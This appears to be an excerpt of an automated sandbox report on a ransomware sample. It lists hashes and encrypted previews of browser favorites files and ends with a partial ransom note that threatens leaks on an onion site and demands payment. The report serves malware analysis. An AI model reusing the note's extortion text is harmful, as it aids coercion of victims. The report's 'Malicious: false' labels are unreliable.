SSDEEP:	192:R0fQcP/GcaeZpNqhmJc2JMutO8oSeSK0beadj5n1ZLLLS+LvSV+0:RuQcP/7pkOJNeyyax5Ln0
MD5:	C04CEFB74B1A49E6CCECDAA7C1014479
SHA1:	6B3BC5186E7A99DE9DD90BEB6ACAD84F9FE1F7D2
SHA-256:	CF96F1E69D6820E092DFC1E0B95076C373C089A77C4D6DEECE38DF10B49D44F5
SHA-512:	8AC872AA9B497AD7640A1E4FDF50010DE5A17F9D8FDB82E7D52F2D4ED3655389A307341F39A1D56E0008C2E1917A4EBF9E6A02B0B43D499CA440443146368833
Malicious:	false
Preview:	&..R...."cc.s.w...^..c..y..2a..}.......K...........[p..\=.4..fJ.......6....h_.a+.h........V...x..'.#..F.f....................6...I.E..\|:@..A..mv.2....ps.%.K.........g?S.8.@7I$...YB.@.{../.K...3r.X......>%T.W&D.Qg..RC.q.nmJ;......qo..'lz............A%.j........(...l.p..8S..y..1.H..z.\|.....<.g...b.{(..U]Zq...VNF..?.NV.Y..P.vq.i..":.........F.`...i..h.5.(.lK'.#V$.o.....mY.>..i2.1".W.N....b7......b..l(....w.......5.l.(C.s.....\|..V......F..;:.<!.9Y~.+.t...-U.@.)..Z.A._..l.m..v. .`.\|P.bP8.Yo.4.g.k.m../......1a.;...D.Sto=.m$_.^..%.......g....:.#\../........,.+.6..............`i....:..Z....bDJ.BW.0..\|=_[c....7..z...=.#.....q.b;....7...XdZ..vWC.l...~r....^c5j.A.Z.....W..9.C<T..h...=..#.d....H...S...=m..n~..+..b/..P.o....nr.!D].%..L.}^.]...q..nF.I...&>..#.k0.x6.a.v...f.....[...].0d..Z.OS.P_....}-..;....+.Q?K.8...a1j........"{.2...4....Q0g\|...[fH..}$.-`.......m..8...d..n.?H.x....dBvj/.6.\|..B..'..j.i[t`Ut..<..F0./.T..53b..G....0S.&..t.Pq..#<k.L.;.

C:\Users\user\Favorites\Google.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980620694862836
Encrypted:	false
SSDEEP:	192:R0fQcP/GcaeZpNqhmJc2JMutO8oSeSK0beadj5n1ZLLLS+LvSV+0:RuQcP/7pkOJNeyyax5Ln0
MD5:	C04CEFB74B1A49E6CCECDAA7C1014479
SHA1:	6B3BC5186E7A99DE9DD90BEB6ACAD84F9FE1F7D2
SHA-256:	CF96F1E69D6820E092DFC1E0B95076C373C089A77C4D6DEECE38DF10B49D44F5
SHA-512:	8AC872AA9B497AD7640A1E4FDF50010DE5A17F9D8FDB82E7D52F2D4ED3655389A307341F39A1D56E0008C2E1917A4EBF9E6A02B0B43D499CA440443146368833
Malicious:	false
Preview:	&..R...."cc.s.w...^..c..y..2a..}.......K...........[p..\=.4..fJ.......6....h_.a+.h........V...x..'.#..F.f....................6...I.E..\|:@..A..mv.2....ps.%.K.........g?S.8.@7I$...YB.@.{../.K...3r.X......>%T.W&D.Qg..RC.q.nmJ;......qo..'lz............A%.j........(...l.p..8S..y..1.H..z.\|.....<.g...b.{(..U]Zq...VNF..?.NV.Y..P.vq.i..":.........F.`...i..h.5.(.lK'.#V$.o.....mY.>..i2.1".W.N....b7......b..l(....w.......5.l.(C.s.....\|..V......F..;:.<!.9Y~.+.t...-U.@.)..Z.A._..l.m..v. .`.\|P.bP8.Yo.4.g.k.m../......1a.;...D.Sto=.m$_.^..%.......g....:.#\../........,.+.6..............`i....:..Z....bDJ.BW.0..\|=_[c....7..z...=.#.....q.b;....7...XdZ..vWC.l...~r....^c5j.A.Z.....W..9.C<T..h...=..#.d....H...S...=m..n~..+..b/..P.o....nr.!D].%..L.}^.]...q..nF.I...&>..#.k0.x6.a.v...f.....[...].0d..Z.OS.P_....}-..;....+.Q?K.8...a1j........"{.2...4....Q0g\|...[fH..}$.-`.......m..8...d..n.?H.x....dBvj/.6.\|..B..'..j.i[t`Ut..<..F0./.T..53b..G....0S.&..t.Pq..#<k.L.;.

C:\Users\user\Favorites\Live.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9801260914850625
Encrypted:	false
SSDEEP:	192:gha6HGClUhI3Gjp/QSZ02LhueKNUDOVJO1Z0xsV+S:ghad8euW4eusOM
MD5:	682454B464D455523FF72503EDF3CDBA
SHA1:	30DF38C7599A42F488C79E25ED833631596E1BE5
SHA-256:	DAC37AA39D7B01B37911C2F120A540CC49B0FE19DD6E334431DF79D363CD7755
SHA-512:	7BF4D66E3B634EAF48F8E8CCF727ED7338682CDB301F16D927991AA8C23CBB27DDF232D9F852039A4B937768A992C8AF0BB581BE392F4100A14398FDC5427D77
Malicious:	false
Preview:	)..z...E$...\-p....&..R.....[$[........M......%.B1P..#E4b..}.cG.N.....`..`..4..V<eV..H.=. ..T..a............./y~..60}.C<$s....)...n..u..EGP.)..O.d=.B...P..H..W..5gz..n.].Z..P.b.........cw..}............n....D.....j..&<.7.a.N..E....&.9.........~.....:.O......7Wn..^...........Jk3:.\|.dZI.d.C.......j.Hx..K..)...a.+.0..3.'...7.M?(..=Y..!Y..l4I..wR.'Y..~.hz.B....8..c T.U.`.....G......xBql.....-f.S...,...8.N......S.@......C2.*GnW...d(....+..T......".T.)=.. ..._....t.X...mtC.J.......&.x....N...cr......?.).......^w.R.}..O.L....O....Ji.a.P...f.....WH..Ih8..w...U.TR....(.q".e..C.@...?...m....!......4.f.........\.....wg...:`.1Wo.8....j..c.`9.NJ..d..m"........:~.\|....,....\|.o.6.[D...%\.zd]Z.....p..C?...s...=z..".K..].l(c...4.s..YN...a.cdv.............w..v./e..~..V..j.E...t....F,..9.6'!b....x.....R....&....../.X....T.1.....C_ ..r..payJ._....9.......]...{. ..?...t....Dd.......xS....c.........E..vP..oD...[.........D.?I.4=.......9.Jy..W.I.

C:\Users\user\Favorites\Live.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9801260914850625
Encrypted:	false
SSDEEP:	192:gha6HGClUhI3Gjp/QSZ02LhueKNUDOVJO1Z0xsV+S:ghad8euW4eusOM
MD5:	682454B464D455523FF72503EDF3CDBA
SHA1:	30DF38C7599A42F488C79E25ED833631596E1BE5
SHA-256:	DAC37AA39D7B01B37911C2F120A540CC49B0FE19DD6E334431DF79D363CD7755
SHA-512:	7BF4D66E3B634EAF48F8E8CCF727ED7338682CDB301F16D927991AA8C23CBB27DDF232D9F852039A4B937768A992C8AF0BB581BE392F4100A14398FDC5427D77
Malicious:	false
Preview:	)..z...E$...\-p....&..R.....[$[........M......%.B1P..#E4b..}.cG.N.....`..`..4..V<eV..H.=. ..T..a............./y~..60}.C<$s....)...n..u..EGP.)..O.d=.B...P..H..W..5gz..n.].Z..P.b.........cw..}............n....D.....j..&<.7.a.N..E....&.9.........~.....:.O......7Wn..^...........Jk3:.\|.dZI.d.C.......j.Hx..K..)...a.+.0..3.'...7.M?(..=Y..!Y..l4I..wR.'Y..~.hz.B....8..c T.U.`.....G......xBql.....-f.S...,...8.N......S.@......C2.*GnW...d(....+..T......".T.)=.. ..._....t.X...mtC.J.......&.x....N...cr......?.).......^w.R.}..O.L....O....Ji.a.P...f.....WH..Ih8..w...U.TR....(.q".e..C.@...?...m....!......4.f.........\.....wg...:`.1Wo.8....j..c.`9.NJ..d..m"........:~.\|....,....\|.o.6.[D...%\.zd]Z.....p..C?...s...=z..".K..].l(c...4.s..YN...a.cdv.............w..v./e..~..V..j.E...t....F,..9.6'!b....x.....R....&....../.X....T.1.....C_ ..r..payJ._....9.......]...{. ..?...t....Dd.......xS....c.........E..vP..oD...[.........D.?I.4=.......9.Jy..W.I.

C:\Users\user\Favorites\NYTimes.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979581989857302
Encrypted:	false
SSDEEP:	192:dzjX9aHGqqam+MaAsiqvKXDv/wgEWcOw3h2FF1xXV+B:dH9l5aVRKXLY4cB3hSxS
MD5:	CC2E5970074930A64F329409670E9DF4
SHA1:	5D8519FD457E87B6F314D8F88D426B3F277D105D
SHA-256:	98255D0B71B6BD986AEE3E89ECA4B71581DB4D0DF4008E765A6681EEA55AE439
SHA-512:	E0ADFD743DD25BE66162DF8E4CD85F9ADC79F7BA9662D07DB45D2C54AB6160353BC1661DA5F8A0C59B12B12591B8C28744D71CFF6DF1747AF5F16B4EBE86A6B0
Malicious:	false
Preview:	6Q..........v..>h.....)?..]9..X......i.....UN.Vf.MV.>xP...6.+./D...t.....1w?.D?7..W.6VsO..zXC'.5....~.$N...B...2....I.$........y..QF1...w........{._......BeO3."... ..5....../X...R.i..d.6.._.....]."6Q./.,Y$...k.\g.A..2.^.Cg..j+.z&@.EF........<.Py5..U<..K\|..x.aE..-..j>.b...4..m9.....0.._..\|...h...f......../.n.......{fxnk.e.Z.b...D..i......z1M.....\Yb.).<N:[....BM.V..".q.,`..W6kK.-.Z..^....Z..Hb.....B......x..67.'.[.{.O.N.....H...Rx...\|..<....r...j..p.$..W.'.C.....G.U.....Y...N.....$.}we.....8.1.Us.......tO...Z..x..-.Cg....:..=.....y.=..IkXb#.V3I.T..N.h..4.>nn`vb../]E.)..........#...U.,....O&..I..CN.Hm."d........:...E....l._ >.P^.,..Nt.TY..D.n.c..%br1=../..\...W....<X.....m..:.{...HzcgF..>..AJ.l=....-..C.\....R........U...=...i..%{....S..m.d......)......L._.0.k.p1UX..G...-.'....s.%p..C.....t...Ky....u..2;5.{..[.......+......c.^.....,.l".....X=.@.J.m\|......W..\|..d-.\Y..D9..@.S8p..2..xi4Pk..#.5..5..0.@..,m.p......M....!.q.u.@@....G_.

C:\Users\user\Favorites\NYTimes.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979581989857302
Encrypted:	false
SSDEEP:	192:dzjX9aHGqqam+MaAsiqvKXDv/wgEWcOw3h2FF1xXV+B:dH9l5aVRKXLY4cB3hSxS
MD5:	CC2E5970074930A64F329409670E9DF4
SHA1:	5D8519FD457E87B6F314D8F88D426B3F277D105D
SHA-256:	98255D0B71B6BD986AEE3E89ECA4B71581DB4D0DF4008E765A6681EEA55AE439
SHA-512:	E0ADFD743DD25BE66162DF8E4CD85F9ADC79F7BA9662D07DB45D2C54AB6160353BC1661DA5F8A0C59B12B12591B8C28744D71CFF6DF1747AF5F16B4EBE86A6B0
Malicious:	false
Preview:	6Q..........v..>h.....)?..]9..X......i.....UN.Vf.MV.>xP...6.+./D...t.....1w?.D?7..W.6VsO..zXC'.5....~.$N...B...2....I.$........y..QF1...w........{._......BeO3."... ..5....../X...R.i..d.6.._.....]."6Q./.,Y$...k.\g.A..2.^.Cg..j+.z&@.EF........<.Py5..U<..K\|..x.aE..-..j>.b...4..m9.....0.._..\|...h...f......../.n.......{fxnk.e.Z.b...D..i......z1M.....\Yb.).<N:[....BM.V..".q.,`..W6kK.-.Z..^....Z..Hb.....B......x..67.'.[.{.O.N.....H...Rx...\|..<....r...j..p.$..W.'.C.....G.U.....Y...N.....$.}we.....8.1.Us.......tO...Z..x..-.Cg....:..=.....y.=..IkXb#.V3I.T..N.h..4.>nn`vb../]E.)..........#...U.,....O&..I..CN.Hm."d........:...E....l._ >.P^.,..Nt.TY..D.n.c..%br1=../..\...W....<X.....m..:.{...HzcgF..>..AJ.l=....-..C.\....R........U...=...i..%{....S..m.d......)......L._.0.k.p1UX..G...-.'....s.%p..C.....t...Ky....u..2;5.{..[.......+......c.^.....,.l".....X=.@.J.m\|......W..\|..d-.\Y..D9..@.S8p..2..xi4Pk..#.5..5..0.@..,m.p......M....!.q.u.@@....G_.

C:\Users\user\Favorites\Reddit.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978191571455435
Encrypted:	false
SSDEEP:	192:f7eYWIpRz5pavvmXcJfZSvggYjHkbADQpNAy35Nr1meV+0:DeYWetpavvmX2fEvggYjHkbADQzAyJDl
MD5:	AF477E4BEA54E0030818C51F4A9739C2
SHA1:	FAA5FD1D72DBBF89500C808B69BBCE8B8214474D
SHA-256:	732A5B8AAD89331EA7E60E15F3821B383538E213EAC30E810BF729472F156643
SHA-512:	278FC8982807EFC3C4C92DB986DE1B611AFA9DC99B9564B28D7D085BA0A93BEA0514386B8BCC5D277F8A70B9872908767A349B8076694C0225E6275CA0198089
Malicious:	false
Preview:	.....%..j.L..[MyF......G...u.[...s...A..>.i5..-...[.Y.>r9~.5`As9.q...0Na6H... .oV6.n.T........I........D.?\|8....4]X. 1.g.a/.(...:.o.+..&...]...xZc.k<)..L...u.RL..\|@.../.5S...P...n...r.......B~f.8....>%.T.el.l...t..z.A..L.....\...s.".^....T.L.$.....W.&V..i./;.r....o..3.?N7.Ve...Z_.dlD@z...{D....p.X..!.N.j#dS].%.]P.gV...Z..\#.P.+...iK..T"5......w....ws.C...../J.FF..5..?..W+F...._.`}Z..p&..>.!......=8..0v....g...X.N.R..SU. ..D.3.KHa.....6....}E.u}......oU..ap.f.....s..-.'\\|........J.Pf.....[.(.O1^..lc)...Q.O.~9zB`......X.U]e..Wx.L.'A..I./...;....3.{.".P.<....vP0A....Q..l.Z.:{)..J. .Eb...h..V..P:..$.u%.3.. y...v.....^.\P..H.v..,...o.c..........SO.33n............26..qGc...8v.3..e`d'.oX..c...T..E:H...PS....LK6.[..@....\|..y.:.h..#..<......^t...rr %..j.A..Ai..._...\|.......Cp.}.<..e..E..7..\|)#..._.......&O..bk~./.............. .....t.8..-..F..q.f.U.i.9&u..&.x.<..1X..Y.....T....}4vC.U.=........$.pXMo.t}{..<AG<.Z@q..y.>..u.]...?.[.L7."9 ..Si

C:\Users\user\Favorites\Reddit.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978191571455435
Encrypted:	false
SSDEEP:	192:f7eYWIpRz5pavvmXcJfZSvggYjHkbADQpNAy35Nr1meV+0:DeYWetpavvmX2fEvggYjHkbADQzAyJDl
MD5:	AF477E4BEA54E0030818C51F4A9739C2
SHA1:	FAA5FD1D72DBBF89500C808B69BBCE8B8214474D
SHA-256:	732A5B8AAD89331EA7E60E15F3821B383538E213EAC30E810BF729472F156643
SHA-512:	278FC8982807EFC3C4C92DB986DE1B611AFA9DC99B9564B28D7D085BA0A93BEA0514386B8BCC5D277F8A70B9872908767A349B8076694C0225E6275CA0198089
Malicious:	false
Preview:	.....%..j.L..[MyF......G...u.[...s...A..>.i5..-...[.Y.>r9~.5`As9.q...0Na6H... .oV6.n.T........I........D.?\|8....4]X. 1.g.a/.(...:.o.+..&...]...xZc.k<)..L...u.RL..\|@.../.5S...P...n...r.......B~f.8....>%.T.el.l...t..z.A..L.....\...s.".^....T.L.$.....W.&V..i./;.r....o..3.?N7.Ve...Z_.dlD@z...{D....p.X..!.N.j#dS].%.]P.gV...Z..\#.P.+...iK..T"5......w....ws.C...../J.FF..5..?..W+F...._.`}Z..p&..>.!......=8..0v....g...X.N.R..SU. ..D.3.KHa.....6....}E.u}......oU..ap.f.....s..-.'\\|........J.Pf.....[.(.O1^..lc)...Q.O.~9zB`......X.U]e..Wx.L.'A..I./...;....3.{.".P.<....vP0A....Q..l.Z.:{)..J. .Eb...h..V..P:..$.u%.3.. y...v.....^.\P..H.v..,...o.c..........SO.33n............26..qGc...8v.3..e`d'.oX..c...T..E:H...PS....LK6.[..@....\|..y.:.h..#..<......^t...rr %..j.A..Ai..._...\|.......Cp.}.<..e..E..7..\|)#..._.......&O..bk~./.............. .....t.8..-..F..q.f.U.i.9&u..&.x.<..1X..Y.....T....}4vC.U.=........$.pXMo.t}{..<AG<.Z@q..y.>..u.]...?.[.L7."9 ..Si

C:\Users\user\Favorites\Twitter.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980343775402425
Encrypted:	false
SSDEEP:	192:OnJMoxCij+83WmRPF4qxVd8rysIDMEi7GWSqWK19kuYjnw356P3LsUnPBV+B:OJMo0iy83WmHz8rePiSHqpknU56f4a8
MD5:	BFA3BDA09A4BEFB393E0E6481FA97384
SHA1:	0C7FBE7B611887E7A6C0258926735BB021D74458
SHA-256:	8069354C7E6263590D126F343A0689D1C936CDA7F06BF76B3F59BE1E238FA29F
SHA-512:	CEFCF86CE4271B3935293DF680512B55D72B30761F96EB7543051D9391BF3554D7756181BB9D73B4D2AAAAB44C8F133DB328B7D226030860FEAB05D627C724A0
Malicious:	false
Preview:	.m.."..pm.g..nn.km..P.xa.......x....0]..;....X..._..d.3.\|..$y8.9..../........'p......^..o..e..D.6.R$g.U... d ..9..Gh.@.dxHg.P.....E.....*c......S7G...LC....#.S@....P._.1.........sF.:NH.1Y.'...9.......Sj.U.d..Y...TB.`..'...%3....9.v(nw'..2T.....U..M.....M.fx.....:.!...h......ME.V..zX..U.`.p..E..#....g.M.g.....M... K.....2a3..q...S'sM.T.<...T.i..,h...A4.{...p..<.?.g..:...uh..l........~....5..et'..n.-.~.^...y.Vy6._n.!..f+..&.h.4{$.2.S...\..\.F.......:.....^N.....w60V....a.....G.^...;...D.7..t.4J........W..Yeu.P...s.#sC.....L......CQr~.#.]F;...W...Nb.%...6.X.<.!..6. ..k[N5`Fg.....>X%...K.&(......L?....<.....J+N..M.h%iB.-?.su......=...-...B.v.^$.b...W.Hzg..k.Rv...~.y..#7.E.;.%e..w.8......?YG...\......4v.....m..k..zcL.Xu3.....F.Kg...L....[.."P...C.t5nY..S)..\;.......j..gx...$>.W_..'.t....>.Jv0%..W:....<:...5.....Z....}..Y..[..J...Ek!.U.xHA.#kp...b/..bf.7geK.{:...{..I...E7.y.~...!...W.%.P..et.G..6.,....,.13'...._....-R.hf....!..n.......Su....e5\|.N..pKf

C:\Users\user\Favorites\Twitter.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980343775402425
Encrypted:	false
SSDEEP:	192:OnJMoxCij+83WmRPF4qxVd8rysIDMEi7GWSqWK19kuYjnw356P3LsUnPBV+B:OJMo0iy83WmHz8rePiSHqpknU56f4a8
MD5:	BFA3BDA09A4BEFB393E0E6481FA97384
SHA1:	0C7FBE7B611887E7A6C0258926735BB021D74458
SHA-256:	8069354C7E6263590D126F343A0689D1C936CDA7F06BF76B3F59BE1E238FA29F
SHA-512:	CEFCF86CE4271B3935293DF680512B55D72B30761F96EB7543051D9391BF3554D7756181BB9D73B4D2AAAAB44C8F133DB328B7D226030860FEAB05D627C724A0
Malicious:	false
Preview:	.m.."..pm.g..nn.km..P.xa.......x....0]..;....X..._..d.3.\|..$y8.9..../........'p......^..o..e..D.6.R$g.U... d ..9..Gh.@.dxHg.P.....E.....*c......S7G...LC....#.S@....P._.1.........sF.:NH.1Y.'...9.......Sj.U.d..Y...TB.`..'...%3....9.v(nw'..2T.....U..M.....M.fx.....:.!...h......ME.V..zX..U.`.p..E..#....g.M.g.....M... K.....2a3..q...S'sM.T.<...T.i..,h...A4.{...p..<.?.g..:...uh..l........~....5..et'..n.-.~.^...y.Vy6._n.!..f+..&.h.4{$.2.S...\..\.F.......:.....^N.....w60V....a.....G.^...;...D.7..t.4J........W..Yeu.P...s.#sC.....L......CQr~.#.]F;...W...Nb.%...6.X.<.!..6. ..k[N5`Fg.....>X%...K.&(......L?....<.....J+N..M.h%iB.-?.su......=...-...B.v.^$.b...W.Hzg..k.Rv...~.y..#7.E.;.%e..w.8......?YG...\......4v.....m..k..zcL.Xu3.....F.Kg...L....[.."P...C.t5nY..S)..\;.......j..gx...$>.W_..'.t....>.Jv0%..W:....<:...5.....Z....}..Y..[..J...Ek!.U.xHA.#kp...b/..bf.7geK.{:...{..I...E7.y.~...!...W.%.P..et.G..6.,....,.13'...._....-R.hf....!..n.......Su....e5\|.N..pKf

C:\Users\user\Favorites\Wikipedia.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978018385763095
Encrypted:	false
SSDEEP:	192:j0R/DCLBuB/tt4ZgB/RNzK7BSC9I1ZVkUzEMvvoIGJWusV+z:jc/Dy0L4Z57oCsVkUAWFGJ1R
MD5:	0DB82588350044F10C0D895C3272FB9D
SHA1:	1DFE0CF7132BE411476FA2BE70F5397498D0D94E
SHA-256:	8406F595CD0CF5FF37B8F93E236897F989572F63E19C3BEA18E13691786A3C9F
SHA-512:	3FB4D009DB11D4A32DDA018A4DCFBF40D33972EE46CB3A107854FD1A8CC203F696B291C04D8C8B771831FB63294869EDE91C8BE75F4A5B249D2D90A262F4154D
Malicious:	false
Preview:	!...$.^..(.)<J7.e......gd.^H..]#L.........6R...o.]4...)..Xq.G.qy..j@.wQ. .......Z.y.j/.......Y...N..@...}f.p...&..>.S..0.......6c.{..m+}.~P+.&....d.B...Z.I.P.lo.?&@..p.....Z~x,....D@.d....$...$sq.....9...,.?F&.x.+.m....P...N.R.p.1I..xJ{k..m....56U.!`.yz.....]{........;/.%[..o.C.D....$...l....._..:.....9S....Yb...u.~r4..W.>....M.B=..Txzp.....u.(K..%-...x..3@>...n.+.lC.C.HO@.}8rH.2..W.m2.YM!.(.g....)Od.9".j%....H..~..lTX...52.._..x......C;b....Y4:xY.s.`.........l.G...k.p...\.{R....0Pw...rJ1..........ERm....a..,.....S...\..G9Y...\|CE.?R&..A.gy].2..B...:.(..N.........$....);i>>....p...(.N...fw..6..l.M..)..2.h.M7.Jt6........0b .W....J.H....6J.".H..n...t._.x.?....3.V..-Iy.j.........&.F..Bu-.c.>..b..t.,..N..F.g\|a....f...i?...:..=...jAM..j..1...s.P.6?{B....&..8.{.....5..`......Z..M....(...7}.u.c..k.....C......c.!..M4}........[..#.I.k.1...;....W.b#..[.....zy.>a...z......7..(\|.Bk.U*.......m.mNk....rL....tv.oVy2@..g...'B....1m..y..z....Y..r.u.+

C:\Users\user\Favorites\Wikipedia.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978018385763095
Encrypted:	false
SSDEEP:	192:j0R/DCLBuB/tt4ZgB/RNzK7BSC9I1ZVkUzEMvvoIGJWusV+z:jc/Dy0L4Z57oCsVkUAWFGJ1R
MD5:	0DB82588350044F10C0D895C3272FB9D
SHA1:	1DFE0CF7132BE411476FA2BE70F5397498D0D94E
SHA-256:	8406F595CD0CF5FF37B8F93E236897F989572F63E19C3BEA18E13691786A3C9F
SHA-512:	3FB4D009DB11D4A32DDA018A4DCFBF40D33972EE46CB3A107854FD1A8CC203F696B291C04D8C8B771831FB63294869EDE91C8BE75F4A5B249D2D90A262F4154D
Malicious:	false
Preview:	!...$.^..(.)<J7.e......gd.^H..]#L.........6R...o.]4...)..Xq.G.qy..j@.wQ. .......Z.y.j/.......Y...N..@...}f.p...&..>.S..0.......6c.{..m+}.~P+.&....d.B...Z.I.P.lo.?&@..p.....Z~x,....D@.d....$...$sq.....9...,.?F&.x.+.m....P...N.R.p.1I..xJ{k..m....56U.!`.yz.....]{........;/.%[..o.C.D....$...l....._..:.....9S....Yb...u.~r4..W.>....M.B=..Txzp.....u.(K..%-...x..3@>...n.+.lC.C.HO@.}8rH.2..W.m2.YM!.(.g....)Od.9".j%....H..~..lTX...52.._..x......C;b....Y4:xY.s.`.........l.G...k.p...\.{R....0Pw...rJ1..........ERm....a..,.....S...\..G9Y...\|CE.?R&..A.gy].2..B...:.(..N.........$....);i>>....p...(.N...fw..6..l.M..)..2.h.M7.Jt6........0b .W....J.H....6J.".H..n...t._.x.?....3.V..-Iy.j.........&.F..Bu-.c.>..b..t.,..N..F.g\|a....f...i?...:..=...jAM..j..1...s.P.6?{B....&..8.{.....5..`......Z..M....(...7}.u.c..k.....C......c.!..M4}........[..#.I.k.1...;....W.b#..[.....zy.>a...z......7..(\|.Bk.U*.......m.mNk....rL....tv.oVy2@..g...'B....1m..y..z....Y..r.u.+

C:\Users\user\Favorites\Youtube.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978719986599969
Encrypted:	false
SSDEEP:	192:eKrxfc3krhe2xz8WclyqlzHlpJoQh+Gea+TwVAV+B:9rle2Srlyqlj3JoQgGeEF
MD5:	D584C6FC40F4B53A02D034FDD54C36B1
SHA1:	BD1951CCE3E00AD22C5ACE565BB45BABDD331247
SHA-256:	0957C4C0198A3E822D27E72881CBBD61C038AD6A83320FC1054D1FB318B08D7E
SHA-512:	660436C59427E50AC95D605C7622F32E8031897F0E45654B64EFFFC83D76FAAD70496806AAF819525F4BC443413403C9CE218012B144ADD12189ACB7A681028C
Malicious:	false
Preview:	<F..9..4.n..3,.tc{.a'Pm.7..~........8:Qv.\|.n....u..I..:...11.m.1.C.4...S.\|v\|-Q...t.f.....g.jj.,u..'......?)&....c..).&...Q..~.."..........g=;..yjT...(z....E~...#.^..!1..y..Yw.a....{[..=(...d./.N....j..0..4.@._.........o.].f.M.av........j4...@.5......#.O..-8.Z:..;#.8.9l.3.u~.;.i..#.r......RY.'u.h.\..'.7....r..b.T....N...."......Z@...W]..!..jw/.. .\|..~. &[..r1.}rU6..8>YC-..t.....&.3QT...!..]_!.}}X.$[.._.S.w...1.@T....3...}@.!oy..@tO.>. ...o..4.I....o[.\.c.~:I.;......cE...........P...q.p..N...._.s...g....,...?...-.-Uq{.s.nQF.....yQ.h...o....\|.e..GR^..rJ...Xb...sw..;sC%c.>.7=...C..O..u.nX.-.....#3............X..:.......bj.....jU.zC.[..6.i...J.[....N.0..f...6..../...h..:6.......X....ez1...V%c..Ay...S....a.^. .o]o}..9\i..8..N....w....r........F..R6.W.`.-),q5.......K.pA.J0}..).OP.....S...gfe..v....m..6.....g:Z..Zm2.J..16.1.r.....Y"...~.LB.Nv%\.V..4_..\|I....1.A...x.......I...@O....%.4l..<.+..2kHU...!a.t.".=.......;t..c....G....L...3~.3"..t.

C:\Users\user\Favorites\Youtube.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978719986599969
Encrypted:	false
SSDEEP:	192:eKrxfc3krhe2xz8WclyqlzHlpJoQh+Gea+TwVAV+B:9rle2Srlyqlj3JoQgGeEF
MD5:	D584C6FC40F4B53A02D034FDD54C36B1
SHA1:	BD1951CCE3E00AD22C5ACE565BB45BABDD331247
SHA-256:	0957C4C0198A3E822D27E72881CBBD61C038AD6A83320FC1054D1FB318B08D7E
SHA-512:	660436C59427E50AC95D605C7622F32E8031897F0E45654B64EFFFC83D76FAAD70496806AAF819525F4BC443413403C9CE218012B144ADD12189ACB7A681028C
Malicious:	false
Preview:	<F..9..4.n..3,.tc{.a'Pm.7..~........8:Qv.\|.n....u..I..:...11.m.1.C.4...S.\|v\|-Q...t.f.....g.jj.,u..'......?)&....c..).&...Q..~.."..........g=;..yjT...(z....E~...#.^..!1..y..Yw.a....{[..=(...d./.N....j..0..4.@._.........o.].f.M.av........j4...@.5......#.O..-8.Z:..;#.8.9l.3.u~.;.i..#.r......RY.'u.h.\..'.7....r..b.T....N...."......Z@...W]..!..jw/.. .\|..~. &[..r1.}rU6..8>YC-..t.....&.3QT...!..]_!.}}X.$[.._.S.w...1.@T....3...}@.!oy..@tO.>. ...o..4.I....o[.\.c.~:I.;......cE...........P...q.p..N...._.s...g....,...?...-.-Uq{.s.nQF.....yQ.h...o....\|.e..GR^..rJ...Xb...sw..;sC%c.>.7=...C..O..u.nX.-.....#3............X..:.......bj.....jU.zC.[..6.i...J.[....N.0..f...6..../...h..:6.......X....ez1...V%c..Ay...S....a.^. .o]o}..9\i..8..N....w....r........F..R6.W.`.-),q5.......K.pA.J0}..).OP.....S...gfe..v....m..6.....g:Z..Zm2.J..16.1.r.....Y"...~.LB.Nv%\.V..4_..\|I....1.A...x.......I...@O....%.4l..<.+..2kHU...!a.t.".=.......;t..c....G....L...3~.3"..t.

C:\Users\user\Favorites\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3767
Entropy (8bit):	5.732830353776197
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69z:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USH
MD5:	EBBC41B4612B4F05935168B03FE2175B
SHA1:	F68370ED27B5467588F93D88554C0B785A44713D
SHA-256:	528B86EC4A39421DB8905A0A5556EB92570F63A3BB43EF16CB5909BCA11ED6F8
SHA-512:	F3514C22495BDA1771C3C292BE9DE3E7E0D78B3AA970CDCFA9D8A134E1DF99DAF056F80AC16B346A49A7E1570FEE6D180F4865A43555E6E9BC5C0408B5F89E97
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 